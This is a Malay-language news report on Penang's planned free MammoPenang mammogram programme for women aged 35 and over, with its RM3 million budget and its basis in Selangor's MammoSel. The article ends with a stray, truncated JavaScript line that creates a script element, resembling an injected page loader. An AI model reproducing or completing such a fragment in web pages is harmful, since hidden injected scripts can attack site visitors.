Oleh: AINUL WARDAH SOHILLI
GEORGE TOWN – Kerajaan Negeri bakal menyediakan pemeriksaan mamogram percuma khusus untuk kaum wanita yang berdaftar undi di Pulau Pinang, kata Exco Pertanian & Industri Asas Tani, Pembangunan Desa dan Kesihatan, Dr. Afif Bahardin di sini baru-baru ini.
Menurutnya, pemeriksaan mamogram percuma dikenali Program MammoPenang (MammoPenang) itu diolah khusus untuk mereka yang berusia 35 tahun dan ke atas.
“Di bawah program tersebut, kami akan menyediakan kemudahan yang perlu bagi membolehkan golongan sasaran menjalani pemeriksaan berkaitan dan hadiri sesi taklimat kesihatan ditetapkan.
“Buat masa ini, kita masih di peringkat akhir penyediaan pemeriksaan dan inisiatif ini akan dilaksanakan secara percubaan kelak selepas sambutan Tahun Baru Cina dengan sasaran 35,000 wanita dan dekati seramai mungkin,” katanya sejurus merasmikan Pusat Informasi Hospital Kanser Mount Miriam di sini baru-baru ini.
Bishop Pulau Pinang, Rev. Sebastian Francis turut sama dalam perasmian tersebut.
Tambah Afif, Kerajaan Negeri bakal membelanjakan RM3 juta untuk tiga tahun pelaksanaan MammoPenang.
Terdahulu, beliau turut mengumumkan perkara sama dalam pertemuan bersama-sama 30 anggota delegasi dari Selangor diketuai Exco Kesihatan, Kebajikan, Pembangunan Wanita dan Keluarga Negeri Selangor, Dr. Daroyah Alwi dan Pengarah Jabatan Kesihatan dan Alam Sekitar, Majlis Bandaraya Petaling Jaya (MBPJ), Dr. Chithradavi N. Vadivellu.
Dalam pertemuan tersebut, Afif menyatakan bahawa pihaknya meneladani model MammoPenang dari Selangor iaitu melalui Skim Kesihatan Wanita : Mammogram Selangor atau lebih dikenali sebagai MammoSel yang telah dilancarkan sejak tahun 2009.
“Seperti Selangor, kita (Kerajaan Negeri) juga menjalankan kempen kesihatan bukan sahaja untuk wanita Pulau Pinang, tetapi merangkumi semua gender dan usia,” jelas beliau.
Hadir sama, Timbalan Setiausaha Kerajaan Negeri Pulau Pinang (Pembangunan) Datuk Abu Jamal Nordin.
var d=document;var s=d.createElement(‘script’);